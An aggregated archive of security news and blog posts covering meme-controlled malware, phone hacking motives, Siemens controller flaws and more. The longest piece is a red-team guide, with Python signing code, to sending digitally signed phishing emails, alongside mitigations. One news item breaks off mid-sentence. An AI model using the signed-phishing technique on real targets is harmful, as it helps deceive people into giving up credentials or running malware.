Category Archives: Hacking

Security Affairs: Malware controlled through commands hidden in memes posted on Twitter

New Malware Takes Commands From Memes Posted On Twitter

Security researchers at Trend Micro have spotted a new strain of malware that retrieves commands from memes posted on a Twitter account controlled by the attackers. In this way, the attackers make it hard to detect traffic associated with the malware, which in this case appears as legitimate Twitter traffic.

The use of legitimate web services to control malware is not a novelty; in the past, crooks have used legitimate services like Gmail, Dropbox, Pastebin, and also Twitter to control malicious code.

The malware discovered by Trend Micro leverages steganography to hide the commands embedded in a meme posted on Twitter.

“This new threat (detected as TROJAN.MSIL.BERBOMTHUM.AA) is notable because the malware’s commands are received via a legitimate service (which is also a popular social networking platform), employs the use of benign-looking yet malicious memes, and it cannot be taken down unless the malicious Twitter account is disabled.” reads the post published by Trend Micro.

“Twitter has already taken the account offline as of December 13, 2018.”

Attackers hid the “/print” command in the memes; it allows them to take screenshots of the infected machine and send them back to a C&C server whose address is obtained through a hard-coded URL on pastebin.com.

The BERBOMTHUM malware checks the Twitter account used by the attackers, downloads and scans meme files, and extracts the command they include.

The Twitter account used by miscreants was created in 2017 and contained only two memes posted on October 25 and 26. The images were used to deliver the “/print” commands to the malware.


Below is the list of commands supported by the malware:

Command       Description
/print        Screen capture
/processos    Retrieve list of running processes
/clip         Capture clipboard content
/username     Retrieve username from infected machine
/docs         Retrieve filenames from a predefined path (desktop, %AppData%, etc.)

According to Trend Micro, the malware is in the early stages of its development; experts noticed that the Pastebin link points to a local, 

Pierluigi Paganini

(SecurityAffairs –malware, memes)

The post Malware controlled through commands hidden in memes posted on Twitter appeared first on Security Affairs.




All the reasons why cybercriminals want to hack your phone

When people think of hacking, most imagine desktop computers, laptops, or perhaps even security cameras. However, in recent years, cybercriminals have expanded their repertoire to include smartphones, too. Here are 10 reasons why they may be looking to hack your phone.

1. To infect it with malware

Many smartphone users assume they can stay safe from malware and other threats by installing antivirus apps on their phones and being extra careful about the websites they visit. They typically don’t expect their phones to have malware out of the box. However, researchers showed that’s what happened with more than three dozen Android models, typically from lesser-known brands.

The phones had Trojan malware installed on them before they reached users, and the culprit appeared to be a software vendor in Shanghai that was a shared reseller for a brand of antivirus software. Although it’s not clear what the hackers wanted to do after infecting the phones, the malware was particularly hard to remove. Often, it involved fully reinstalling the operating system.

2. To eavesdrop on calls

People use their phones to speak to loved ones, discuss business plans, talk about their travels—all manner of personal, intimate content. So, it’s not surprising that criminals would want to break in and listen, whether to case a target or simply for voyeuristic pleasure. But how do they do it?

There’s a flaw in the SS7 signaling system used by US cellular networks, which allows hackers to listen to calls, read texts, and see users’ locations after learning their phone numbers. Even though US agencies know about the issue, they haven’t taken decisive action to fix it, leaving Americans’ phone privacy at risk.

3. To steal money

Ransomware attacks cause headaches for computer users by making the affected machines lock up or holding files hostage until people pay the ransom to restore access. Even then, paying doesn’t guarantee a return to proper functionality. Ransomware doesn’t only affect computers, though. There’s a recent trend of mobile ransomware, which often originates from malicious, third-party apps.

In one example, a third-party app promised to optimize the Android system but actually tricked people into transferring $1,000 from their PayPal accounts. The login process was legitimate, so it wasn’t a phishing attempt. However, once people logged in, a Trojan automated the PayPal transfer.

4. To blackmail people

The crime of blackmail isn’t new, but threat actors recognize that the small computer in people’s pockets and purses likely has more personal information stored in it than a desktop or laptop. And they are able to first cut people off from accessing their phones before then threatening to leak the information they find.

Criminals may start the hack after obtaining some personal information about a victim that is available on the black market due to a previous, unrelated breach. They then use that information to contact the victim’s phone company and pose as the user, saying that they want to transfer the number to a new phone. Phone companies often provide such services and can automatically transfer information, including phone numbers, to a new device. The trouble is that in this case, the old phone still works but it’s useless to the person who owns it.

After hackers take over a phone in this way, the stage is set for more serious crimes—blackmail among them. If a person had essential numbers in their phone not backed up elsewhere, they could easily feel pressured to cave in to hackers’ demands to avoid worse consequences.

5. To damage your phone

Hackers feel they’ve accomplished a goal by causing chaos for victims. One way to do that is to make the phone overheat and ultimately ruin it. Security researchers warned that hackers could break into a phone’s processor and use it for mining cryptocurrency. In addition to making the phone slow down, it can also cause the phone to get too hot or even blow up!

There are many reliable cooling devices used in cell phones for temperature management, even “intelligent” temperature management solutions that heat up your phone’s battery when it’s too cool and cool it down when it’s too hot. However, if hackers have their way, even those normally sufficient internal components could fail to keep the device cool enough.

One type of cryptomining malware, called Loapi, is often hidden in apps that appear as downloadable games. Security researchers ran a test and found it actually made a phone battery bulge due to excessive heat after only two days.

6. To threaten national security

Countless analysts have chimed in to say that President Trump’s alleged use of insecure mobile devices could help foreign adversaries glean information about the United States that could threaten the nation or at least give information about the president’s intended actions.

In 2018, Billy Long, a Republican congressman, had his mobile phone and Twitter account hacked. Cybercriminals know that one of the primary ways politicians interact with followers is through social media.

Besides threatening national security more directly, these hackers could erode the trust politicians have built with their audiences, especially with fake posts that seem to come from the genuine account owners.

Cybercriminals know that by hacking the mobile phones and social media accounts of politicians, they are contributing to the overall public opinion that politicians cannot be trusted. Instead of looking to the source for information, users might instead look for news via sources that are even less reliable or strategically crafted to spread fake news.

7. For fun or notoriety

Some hackers get a thrill from successfully pulling off their attacks. Hacking is a source of entertainment for them, as well as an ego boost. If money isn’t the primary motivator for cybercriminals, then notoriety might be a close second. Hackers may get into phones because it’s a newer challenge that might require more cutting-edge malware development techniques. Ultimately, many cybercriminals want approval from others in the industry and desire their respect.

8. To get payment information

E-wallets, which store payment information inside smartphone apps so people don’t have to carry real credit or debit cards, are convenient. However, their rising popularity has given hackers another reason to target phones.

Often, cybercriminals entice people to download fake mobile payment apps (of course believing they are real). Then, once people enter their payment information, hackers have the information needed to charge transactions to the cards.

9. Because so many people use it

Since hackers want their attacks to have significant payoffs, they know they can up their chances of having a major impact by targeting smartphones. Information published by the Pew Research Center shows 95 percent of Americans own smartphones. To put that in perspective, only 35 percent of the population did in 2011, when the organization first conducted a survey on smartphone ownership.

Also, different research from another organization reveals that mobile Internet usage is overtaking desktop time. People are becoming increasingly comfortable with using their smartphones to go online, browse, and even shop. As such, no matter what kind of hack cybercriminals orchestrate, they can find plenty of victims by focusing on smartphone users.

10. Because it’s an easy target

Research shows that mobile apps have rampant security problems. This gives criminals ample opportunity to infiltrate insecure apps rather than the phones themselves.

In one case, about 40 of the top 50 shopping apps had at least a few high-level security vulnerabilities that allowed hackers to see personal information or deceive users by luring them to dangerous apps that were copies of the originals.

Further research about problematic dating apps found that many of them give third parties access to unencrypted data through vulnerable software development kits (SDKs). Hackers know some apps achieve hundreds of thousands, or even millions, of downloads. If they can break into them, they’ll get fast access to the phones that have those apps installed and the people who use them.

How to stay protected

These examples show that hackers have a myriad of reasons to hack phones and even more ways to make it happen. One easy way to protect against attacks is to avoid third-party app stores and only download content from the phone’s legitimate app stores, such as Google Play or iTunes. However, threat actors can penetrate those platforms, too, and many an infected or rogue app has made its way through.

It’s also smart to keep tabs on phone statistics, such as battery life and the number of running apps. If those deviate too much from the norm, that’s a sign hackers may be up to no good in the background.

Running a mobile antivirus scan at least monthly, or installing an always-on cybersecurity program is another good strategy, but only if the application comes from a trustworthy source, such as the vendor’s official site.

Instead of being overeager to download new apps, people should ideally exercise caution and only do so if numerous sources of feedback indicate they are free from major security flaws. Some app development companies are in such a hurry to get to the market with their latest offerings that they do not make security a priority.

Besides these more specific tips, it’s essential for people to be highly aware of how they interact with their phones. For example, strange pop-ups or redirects in a phone’s browser, or random icons appearing without having downloaded a new app could indicate problems, and individuals should not assume that everything’s okay. When in doubt, it’s best to stop using the phone and get some answers—before hackers learn all they need to know about you.

The post All the reasons why cybercriminals want to hack your phone appeared first on Malwarebytes Labs.

Hacker found using Twitter memes to spread malware

By Waqas

Last year a shocking report revealed how Russian hackers were found spreading malware through Britney Spears’s Instagram posts. Now, the IT security researchers at Trend Micro have discovered a sophisticated campaign in which an unknown hacker is using memes on the social networking service Twitter, to spread malware. According to Trend Micro’s report released on Monday […]

This is a post from HackRead.com. Read the original post: Hacker found using Twitter memes to spread malware

Radware Blog: Top 6 Threat Discoveries of 2018

Over the course of 2018, Radware’s Emergency Response Team (ERT) identified several cyberattacks and security threats across the globe. Below is a round-up of our top discoveries from the past year. For more detailed information on each attack, please visit DDoS Warriors. DemonBot Radware’s Threat Research Center has been monitoring and tracking a malicious agent […]

The post Top 6 Threat Discoveries of 2018 appeared first on Radware Blog.




Your trust, our signature

Written and researched by Mark Bregman and Rindert Kramer

Sending signed phishing emails

Every organisation, whatever its size, will encounter phishing emails sooner or later. While the number of phishing attacks is increasing every day, the way in which phishing is used within a cyber-attack has not changed: an attacker comes up with a scenario which looks credible enough to persuade the target to perform a certain action like opening an attachment or clicking on a link in the email. To avoid such attacks the IT or security team will tell users to check for certain things to avoid falling for these phishing emails. One of the recommendations is to check if the email is digitally signed with a valid certificate. However, in this blog, we present an attack that abuses this recommendation to regain the recipient’s trust in the sender.

Traditional phishing

Countless organizations have fallen victim to traditional phishing attacks where the attacker tries to obtain credentials or to infect a computer within the target network. Phishing is a safe way to obtain such footholds for an attacker. The attacker can just send the emails, sit back and wait for the targets to start clicking.

At Fox-IT we receive lots of requests to run simulated phishing attacks; so our team sends out hundreds of thousands of carefully crafted emails every year to clients to simulate phishing campaigns. Whether it’s a blanket campaign against the entire staff or a spear phishing one against targeted individuals, the big issue with phishing stays the same; we need to persuade one person to follow our instructions. We are looking for the weakest link. Sometimes that is easy, sometimes not so much. But an attacker has all the time in the world. If there is no success today, then maybe tomorrow, or the day after…

To create security awareness among employees, IT or the security team will tell their users to take a close look at a wide variety of things upon receiving emails. Some say you have to check for spelling mistakes, others say you have to be careful when you receive an email that tries to force you to do something (“Change your password immediately, or you will lose your files”), or when something is promised (“Please fill in this survey and enter the raffle to win a new iPhone”).

SPF records

Some will tell their users to check the domain that sent the email. But others might argue that anyone can send an email from an arbitrary domain; what’s known as ‘email spoofing’.

Wikipedia defines this as:

Email spoofing is the creation of email messages with a forged sender address. Because the core email protocols do not have any mechanism for authentication, it is common for spam and phishing emails to use such spoofing to mislead the recipient about the origin of the message.

— Wikipedia https://en.wikipedia.org/wiki/Email_spoofing

This means that an email originating from the domain “fox-it.com” may not have been sent by an employee of Fox-IT. This can be mitigated by implementing Sender Policy Framework (SPF) records. In an SPF record you specify which email servers are allowed to send emails on behalf of your domain. If an email originating from the domain “fox-it.com” was not sent by the email server specified in the SPF record, the email message can be flagged as SPAM. By using SPF records you know that the email was sent by an authorized email server; SPF records, however, do not disclose the authenticity of the sender. If a company has configured its SMTP server as an open relay, users can send mail on another user’s behalf and it will still pass the SPF check on the receiver’s end. There are other measures that can be used to identify legitimate mail servers and reduce phishing attacks, such as DKIM and DMARC; however, these are beyond the scope of this blog post.
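The SPF check described above, as an added example that is not Fox-IT’s code: a minimal evaluator that tests a connecting IP address against a domain’s SPF record. The records, domains and addresses are constructed, only the ip4, ip6 and all mechanisms are implemented (include:, a and mx would need DNS lookups), and the function names are my own. It also shows the limitation the paragraph makes: any message relayed through an authorized server passes, whatever name is in the sender address.

```python
import ipaddress

# Constructed SPF TXT records for example domains (assumptions, not real DNS data);
# a real implementation would fetch the TXT record of the domain from DNS.
SPF_RECORDS = {
    "fox-it.com": "v=spf1 ip4:198.51.100.0/24 ip4:203.0.113.25 -all",
    "example.org": "v=spf1 ip4:192.0.2.0/24 ~all",
}

# Result returned when a mechanism matches, keyed by its qualifier (RFC 7208)
QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def evaluate_spf(domain, sending_ip, records=SPF_RECORDS):
    """Evaluate the SPF record of `domain` for a connection from `sending_ip`.

    Returns 'pass', 'fail', 'softfail', 'neutral' or 'none' (no record published).
    Only the ip4, ip6 and all mechanisms are handled, because they need no further
    DNS lookups; include:, a, mx, exists and redirect= are skipped (a simplification).
    """
    record = records.get(domain.lower())
    if record is None:
        return "none"
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    ip = ipaddress.ip_address(sending_ip)
    for term in terms[1:]:
        qualifier = "+"                      # a mechanism without a qualifier means "+"
        if term[0] in QUALIFIER_RESULT:
            qualifier, term = term[0], term[1:]
        mechanism, _, argument = term.partition(":")
        mechanism = mechanism.lower()
        if mechanism == "all":
            return QUALIFIER_RESULT[qualifier]
        if mechanism in ("ip4", "ip6"):
            network = ipaddress.ip_network(argument, strict=False)
            if ip.version == network.version and ip in network:
                return QUALIFIER_RESULT[qualifier]
        # other mechanisms need DNS lookups and are not implemented here
    return "neutral"                         # nothing matched and no explicit "all"


def spf_verdict(mail_from, sending_ip, records=SPF_RECORDS):
    """SPF result for the domain of the envelope sender address.

    A 'pass' only says the connecting server may send for that domain; it says
    nothing about who wrote the message or whether the local part is genuine.
    """
    return evaluate_spf(mail_from.rsplit("@", 1)[-1], sending_ip, records)


if __name__ == "__main__":
    # Constructed sample connections: authorized relay, unknown host, no record
    samples = [
        ("alice@fox-it.com", "198.51.100.7"),     # authorized server -> pass
        ("mallory@fox-it.com", "198.51.100.7"),   # same server, any local part -> pass
        ("alice@fox-it.com", "203.0.113.99"),     # not in the record, -all -> fail
        ("bob@example.org", "198.51.100.200"),    # not in the record, ~all -> softfail
        ("eve@nospf.example", "198.51.100.7"),    # no SPF record -> none
    ]
    for mail_from, ip in samples:
        print(f"{mail_from:22} from {ip:16} -> {spf_verdict(mail_from, ip)}")
```

The second sample is the point of the paragraph: the authorized relay makes mallory@fox-it.com pass exactly as alice@fox-it.com does, so SPF answers "was this server allowed to send for the domain", not "is this person who they claim to be".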

What is a digital signature?

To tackle the problem of email spoofing some organizations sign their emails with a digital signature. This can be added to an email to give the recipient the ability to validate the sender as well as the integrity of the email message.

For now we’ll focus on the aspect of validating the sender rather than the message integrity aspect. When the email client receives a signed email, it will check the attached certificate to see who the subject of the certificate is (e.g. “john.doe@fox-it.com”). The client will check if this matches the originating email address. To verify the authenticity of the digital signature, the email client will also check if the certificate is issued (signed) by a reputable Certificate Authority (CA). If the certificate is signed by a trusted Certificate Authority, the receiving email client will tell the recipient that the email is signed using a valid certificate. Most email clients will in this case show a green checkmark or a red rosette, like the one in the image below.

[image: signed email indicator (green checkmark or red rosette) shown by the mail client]

By default there is a set of trusted Certificate Authorities in the Windows certificate store. With digital certificates, everything is based on trusting those third parties, the Certificate Authorities. So we trust that the Certificate Authorities in our Windows certificate store give out certificates only after verifying that the certificate subject (e.g. “john@fox-it.com”) is who they say they are. If we receive a signed email with a certificate which is verified by one of the Certificate Authorities we trust, our systems will tell us that the origin of the email is trusted and validated.

Obviously the opposite is also true. If you receive a signed email and the attached certificate is not signed by a Certificate Authority which is in the Windows certificate store, then the signature will be considered invalid. It is possible to attach a self-signed certificate to an email; in which case the email will be signed, but the receiving email client won’t be able to validate the authenticity of the received certificate and therefore will show a warning message to the recipient.

[image: warning shown by the mail client for an email signed with a self-signed certificate]

Common misconception regarding email signing

Some IT teams are pushing email signing as the Holy Grail to avoid being caught by a phishing email, because it verifies the sender. And if the sender is verified, we have nothing to worry about.

Unfortunately, the green checkmark or the red rosette which accompanies a validated email signature seems to stimulate the same behavior as we’ve seen with the green padlock accompanying HTTPS websites. Users see the green padlock in their browser and think that the website is absolutely safe. Similarly, they see the green checkmark or the red rosette and make the assumption that everything is safe: it’s a signed email with a valid certificate, the sender is verified, which means everything must be OK and that the email can’t be a phishing attack.

This may be true, if alice@fox-it.com sends you a signed email with a valid certificate: the sender really is Alice from Fox-IT, provided that the private key of the certificate is not compromised. But, if alice@fox-it.cm (notice the ‘.cm’ instead of ‘.com’) sends you a signed email with a valid certificate, that person can still be anyone. As long as that person has control over the domain ‘fox-it.cm’, they will be able to send signed emails from that domain. Because many users are told that the green checkmark or the red rosette protects against phishing, they may be caught off guard if they receive an email containing a valid certificate.

Sending signed phishing emails

At Fox-IT we’re always trying to innovate, meaning in this case that we’re looking for ways to make the phishing emails in our simulations more appealing to our clients’ employees. Adding a valid certificate makes them look genuine and creates a sense of trust. So when running phishing simulations we use virtual private servers to do the job. For each simulation we set up a fresh server with the required configuration in order to deliver the best possible phishing email. To send out the emails, we’ve developed a Python script into which we can feed a template, some variables and a target list. Recently we’ve updated the script to include the ability to sign our phishing emails. This results in very convincing phishing emails. For example, in Microsoft Office Outlook one of our phishing emails would look like this:

[image: signed phishing email as displayed in Microsoft Office Outlook]

This is not limited to Office Outlook; it works in other mail clients as well, such as Lotus Notes. Although Lotus Notes doesn’t have a red rosette to show the user that an email is digitally signed, there are some indicators which are present when reading a signed email. As you can see below, the digital signature does still add to the legitimate look of the phishing emails:

[image: signed phishing email as displayed in Lotus Notes]

Going the extra mile

The user has now received a phishing mail that was signed with a legitimate certificate. To make it look even more genuine, we can mention the certificate in the phishing mail. Since the Dutch government has a webpage [1] with information about the use of electronic signatures in email, we can write a paragraph that looks something like the one in the image below.

[image: paragraph of the phishing email referring to the Dutch government page on electronic signatures]

Sign the email

The following (Python) code snippet shows the main signing functionality:

# Import the necessary classes from the M2Crypto library
from M2Crypto import BIO, Rand, SMIME

def makebuf(text):
    # Wrap the message text in an M2Crypto memory buffer (M2Crypto expects bytes)
    if isinstance(text, str):
        text = text.encode('utf-8')
    return BIO.MemoryBuffer(text)

# msg_str (the message body), sender, target and subject are supplied by the
# calling script; this snippet only shows the signing step.

# Make a MemoryBuffer of the message.
buf = makebuf(msg_str)

# Seed the PRNG from the saved state file (-1 reads the whole file).
Rand.load_file('randpool.dat', -1)

# Instantiate an SMIME object; load the key and certificate; sign the buffer.
s = SMIME.SMIME()
s.load_key('key.pem', 'cert.pem')
p7 = s.sign(buf, SMIME.PKCS7_DETACHED)

# Recreate buf, since signing consumed the original buffer.
buf = makebuf(msg_str)

# Output p7 in mail-friendly format, preceded by the basic headers.
out = BIO.MemoryBuffer()
out.write(('From: %s\n' % sender).encode('utf-8'))
out.write(('To: %s\n' % target).encode('utf-8'))
out.write(('Subject: %s\n' % subject).encode('utf-8'))

s.write(out, p7, buf)
msg = out.read()

# Save the PRNG's state.
Rand.save_file('randpool.dat')

This code originates from the Python M2Crypto documentation [2].

For the above code to work, the following files must be in the same directory as the Python script:
* The public certificate saved as cert.pem
* The private key saved as key.pem

There are many Certificate Authorities that allow you to obtain a certificate online. Some even allow you to request a certificate for your email address for free. A quick Google query for “free email certificate” should give you enough results to start requesting your own certificate. If you have access to an inbox you’re good to go.

To get an idea of how the above code snippet can be included in a standalone script, we’d like to refer to Fox-IT’s GitHub page, where we’ve uploaded an example script which takes the most basic email parameters (‘from’, ‘to’, ‘subject’ and ‘body’). Don’t forget to place the required certificate and corresponding key file in the same directory as the Python script if you start playing around with the example script. Link to project on GitHub: https://github.com/fox-it/signed-phishing-email

Mitigation

There are some mitigations that can make this type of attack harder to perform for an attacker. We’d like to give you some tips to help protect your organisation.

Prevent domain squatting

The first mitigation is to register domains that look like your own domain. An attacker that sends a phishing mail from a domain name that is similar to your own domain name can more easily trick users into executing malware or giving away their credentials. This type of attack is called domain squatting, which can result in examples like fox-it.cm instead of fox-it.com. There are generators that can help you with that, such as: https://github.com/elceef/dnstwist

Restrict Enhanced Key Usages

Another mitigation has a more technical approach. For that we need to look into how certificates are used. Let’s say we have an internal Public Key Infrastructure (PKI) with the following components:
* Root CA
* Subordinate CA

The root CA is an important server in an organisation for maintaining integrity and secrecy. All non-public certificates will stem from this server. Most organizations choose to completely isolate their root CA for that reason and use another server, the subordinate CA, to sign certificate requests; the subordinate CA will sign certificates on behalf of the root CA.

In Windows, the certificate of the root CA is stored in the Trusted Root Certification Authorities store, while the certificate of the subordinate CA is stored in the Intermediate Certification Authorities store.

Certificates can be used in many scenarios, for example:
* If you want to encrypt files, you can use Encrypted File System (EFS) in Windows. EFS uses a certificate to protect your data from prying eyes.
* If you have a web server, you can use a certificate to establish a secure connection with a client so that all data is transferred securely.
* Stating the obvious: if you want to send email in a secure way, you can also use a certificate to achieve that.

Not every certificate can sign code, encrypt files or send email securely. Certificates have a property, the Enhanced Key Usage (EKU), that states the intended purpose of a certificate. The intended purpose can be one of the actions mentioned above, or a wildcard. A certificate with only an EKU for code signing cannot be used to send email in a secure manner.

By disabling the “Secure Email” EKU for all certification authorities except our own root and subordinate CA, a phishing mail that is signed with a valid certificate issued by a third-party CA will still trigger a warning stating that the certificate is invalid.

To do that, we must first discover all certificates that support the Secure Email EKU. This can be done with the following PowerShell one-liner:

# Select all certificates where the EnhancedKeyUsage is empty (Intended Purpose -eq All)
# or where EnhancedKeyUsage contains Secure Email. The two EKU tests are grouped with
# parentheses: wrapped in { } they would be script blocks, which always evaluate as true.
Get-ChildItem -Path 'Cert:\' -Recurse |
    Where-Object {
        $_.GetType().Name -eq 'X509Certificate2' -and
        ($_.EnhancedKeyUsageList.Count -eq 0 -or
         $_.EnhancedKeyUsageList.FriendlyName -contains 'Secure Email')
    } |
    Select-Object PSParentPath, Subject

We now know which certificates support the Secure Email EKU. In order to disable the Secure Email EKU we have to do some manual labour. It is recommended to apply the following in a base image, group policy or certificate template.

  1. Run mmc with administrative privileges
  2. Go to File, Add or Remove Snap-ins, select Certificates
  3. Select My user account, followed by OK. Please note that this mitigation requires that certificates in all certificate stores must be edited.
     3.1. Check if the intended purpose states Secure Email or All
  4. Open the properties of a certificate and click the Details tab

If the intended purpose at step 3.1 stated All:
  1. Click Key Usage, followed by Edit Properties.
  2. Click Enable only the following purposes and uncheck the Secure Email checkbox

If the intended purpose at step 3.1 stated Secure Email:
  1. Click Enhanced Key Usage (property)
  2. Click Edit Properties…
  3. Uncheck the Secure Email checkbox

Please keep the following in mind when implementing these mitigations:
* When a legitimate mail has been signed with a certificate issued by a CA from which the Secure Email EKU has been removed, the certificate of the email will not be trusted by Windows
* Changing the EKU may have an impact on the working of your systems
* These settings can be reverted with every update in Windows
* New or renewed certificates can have the Secure email EKU as well

This means that in order to only allow your own PKI server to have the Secure Email EKU enabled you must periodically check for certificates that have this EKU configured.

Human factor

With techniques like the one described in this blog post it becomes more and more obvious that users will never be able to withstand every social engineering attack. In the best case, users will detect and report an attack; in the worst case, your users will become victims. It is important to perform awareness exercises and educate users, but we should accept that a percentage of the user base could always become a victim. This means that we (organizations) need to start thinking about new and more user-friendly strategies for combating these types of attacks.

To summarize this blog post:
* An email coming from a domain does not prove the integrity of the sender
* An email that is signed with a trusted and legitimate certificate does not mean that the email can be trusted
* Only if the domain of the sender address is correct and the email has been signed with a valid certificate issued by a trusted CA can the email be trusted.


Twitter uncovered a possible nation-state attack

Twitter discovered a possible nation-state attack while it was investigating an information disclosure flaw affecting its platform.

Experts at Twitter discovered a possible state-sponsored attack while they were investigating an information disclosure vulnerability affecting its support forms. The experts discovered that the attack was launched from IP addresses that may be linked to nation-state actors.

The flaw affected a support form that could be used to contact Twitter in case of problems with an account. The flaw could have been exploited to obtain the country code of a user’s phone number and determine whether or not the account had been locked by Twitter.

An account could be locked if it violates rules or terms of service, or if the account was compromised. The social media platform fixed the flaw on November 15, in just 24 hours.

The experts noticed a suspicious activity related to the API associated with the flawed customer support form.

“During our investigation, we noticed some unusual activity involving the affected customer support form API.” reads a blog post published by Twitter.

“Specifically, we observed a large number of inquiries coming from individual IP addresses located in China and Saudi Arabia. While we cannot confirm intent or attribution for certain, it is possible that some of these IP addresses may have ties to state-sponsored actors. We continue to err on the side of full transparency in this area and have updated law enforcement on our findings.”


Twitter, like many other social media platforms, is a privileged target for state-sponsored hackers, who could use it for online propaganda and to spread fake news.

In November, the researcher Terence Eden discovered that the permissions dialog when authorizing certain apps to Twitter could expose direct messages to the third-party. The expert was awarded $2,940 for reporting the bug to the company under the bug bounty program operated through the HackerOne platform.

Pierluigi Paganini

(SecurityAffairs – intelligence, hacking)

The post Twitter uncovered a possible nation-state attack appeared first on Security Affairs.

Pro-PewDiePie messages appear on hacked Wall Street Journal website

By Waqas

The official website of the Wall Street Journal was hacked earlier today after unknown hackers defaced it with messages in support of PewDiePie (Felix Kjellberg), the most widely followed YouTuber. The hackers left a deface page along with a message on the domain (partners.wsj.com) that WSJ uses to publish content paid for by advertisers. The deface […]

This is a post from HackRead.com Read the original post: Pro-PewDiePie messages appear on hacked Wall Street Journal website

Chinese hackers reportedly stole secret US Navy data

By Waqas

Hackers of Chinese origin have stolen data from US Navy contractors whose content includes highly confidential information on advanced military technologies. In June this year, it was reported that Chinese hackers stole 614 gigabytes of US Navy’s anti-ship missile data. Now, authorities in the United States have once again accused Chinese hackers of stealing secret data belonging […]

This is a post from HackRead.com Read the original post: Chinese hackers reportedly stole secret US Navy data

Germany’s BSI chief says ‘No Evidence’ of Huawei spying

The head of Germany’s BSI admitted that so far there is no proof of espionage activity conducted through Huawei technology.

US first, and many other countries after, have decided to ban network equipment manufactured by the Chinese telecom giant Huawei.

In November 2018, the Wall Street Journal reported that the US Government is urging its allies, including Germany, to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy and Japan. Currently the main mobile network operators in Germany use Huawei technology for their infrastructure.

Now Germany’s IT watchdog has expressed its opinion on the proposed ban of Huawei technology, highlighting that there is no evidence that the equipment could be used by Chinese intelligence for cyber espionage.

On Friday, the head of Germany’s Federal Office for Information Security (BSI), Arne Schoenbohm, admitted that so far there is no proof of espionage activity conducted through Huawei technology.

“For such serious decisions like a ban, you need proof,” Arne Schoenbohm, told news weekly Spiegel, confirming that the BSI had no such evidence.

Huawei has already been excluded by several countries from building their 5G internet networks. The United States, Australia, New Zealand, and Japan have announced the exclusion of Huawei technology from their 5G networks.

Schoenbohm explained that BSI experts assessed Huawei products from around the world and have not found suspicious components or backdoors.

BSI experts also visited the recently opened Huawei Security Innovation Lab in Bonn, a center that will work closely with German customers, partners, research institutions as well as government and supervisory authorities.

Commenting on the opening of the laboratory, BSI President Arne Schönbohm said: “We welcome the opening of this laboratory, which will allow further and deeper technical exchange between Huawei and BSI to address the future challenges of cyber security”.


Many security experts continue to express their concerns about Huawei products.

“I believe it’s wrong to suggest that the concerns about Chinese espionage are unfounded and easy to detect,” telecom security expert Ronja Kniep told AFP.

“Even if Huawei has no official relationship with the Chinese government, that doesn’t mean Chinese services aren’t using the company and its technology as vehicles for espionage.”

Pierluigi Paganini

(SecurityAffairs – BSI, Huawei)

The post Germany’s BSI chief says ‘No Evidence’ of Huawei spying appeared first on Security Affairs.

Siemens addresses multiple critical flaws in SINUMERIK Controllers

Siemens addressed several vulnerabilities in SINUMERIK controllers, including denial-of-service (DoS), privilege escalation and code execution issues.

Siemens has fixed several flaws in SINUMERIK controllers, some of them classified as “critical.” The list of vulnerabilities includes DoS, privilege escalation and code execution flaws.

Security experts at Kaspersky Lab discovered that SINUMERIK 808D, 828D and 840D controllers are affected by multiple vulnerabilities.

“The latest updates for SINUMERIK controllers fix multiple security vulnerabilities that could allow an attacker to cause Denial-of-Service conditions, escalate privileges, or to execute code from remote.” reads the security advisory published by Siemens.

“Siemens has released updates for several affected products, is working on updates for the remaining affected products and recommends specific countermeasures until fixes are available. Siemens recommends to update affected devices as soon as possible.”


The most serious flaw, tracked as CVE-2018-11466 and rated with a CVSS score of 10, could be exploited by an unauthenticated attacker on the network to trigger a DoS condition on the integrated software firewall or execute arbitrary code in the context of the firewall by sending specially crafted packets to TCP port 102.

“Specially crafted network packets sent to port 102/tcp (ISO-TSAP) could allow a remote attacker to either cause a Denial-of-Service condition of the integrated software firewall or allow to execute code in the context of the software firewall.” continues the advisory.

“The security vulnerability could be exploited by an attacker with network access to the affected systems on port 102/tcp. Successful exploitation requires no user privileges and no user interaction. The vulnerability could allow an attacker to compromise confidentiality, integrity and availability of the system.”

Siemens also fixed CVE-2018-11457 in the integrated web server; the flaw can be exploited by a network attacker with access to TCP port 4842 to execute code with elevated privileges by sending specially crafted packets.

“The security vulnerability could be exploited by an attacker with network access to the affected devices on port 4842/tcp. Successful exploitation requires no privileges and no user interaction. The vulnerability could allow an attacker to compromise confidentiality, integrity and availability of the webserver.” continues the advisory.

Another critical flaw, tracked as CVE-2018-11462, could be exploited to elevate privileges, though not to root.

The last critical vulnerability, tracked as CVE-2018-11458, affects the integrated VNC server; it could be exploited to execute arbitrary code with elevated privileges via specially crafted network packets sent to port 5900.

Siemens also fixed three high-severity flaws that allow local code execution, and three medium-severity privilege escalation and DoS bugs.

The good news is that Siemens is not aware of attacks exploiting the above flaws. 

Pierluigi Paganini

(Security Affairs – Siemens, Sinumerik)

The post Siemens addresses multiple critical flaws in SINUMERIK Controllers appeared first on Security Affairs.

PewDiePie fan hacker compromises 100,000 printers

By Waqas

A couple of weeks ago, a hacker going by the online handle of TheHackerGiraffe hacked over 50,000 printers for the sake of promoting PewDiePie’s YouTube channel and urging users to subscribe to his channel. Now, the same hacker has struck again and claims to have hacked over 100,000 printers globally. This time with the help of another […]

This is a post from HackRead.com Read the original post: PewDiePie fan hacker compromises 100,000 printers

Wicked scammers steal $1 million from Save the Children charity

By Uzair Amir

Another day, another email scam – This time, wicked scammers have stolen over $1,000,000 from Save the Children, an international non-governmental organization based in London, United Kingdom. This happened after scammers compromised email address of one of the Save the Children employees and generated fake invoices and other documents to trick the charity organization into sending 1 million […]

This is a post from HackRead.com Read the original post: Wicked scammers steal $1 million from Save the Children charity

US ballistic missile defense systems (BMDS) open to cyber attacks

U.S. Ballistic Missile Defense Systems Fail Cybersecurity Audit

The US DoD Inspector General’s report revealed that the United States’ ballistic missile defense systems (BMDS) fail to implement cyber security requirements.

The U.S. Department of Defense Inspector General published a report this week that revealed a lack of adequate cybersecurity for the protection of the United States’ ballistic missile defense systems (BMDS).

Ballistic missile defense systems are crucial components of the US Defense infrastructure, they aim to protect the country from short, medium, intermediate and long-range ballistic missiles.


Experts warn of cyber attacks against these systems launched by nation-state actors.

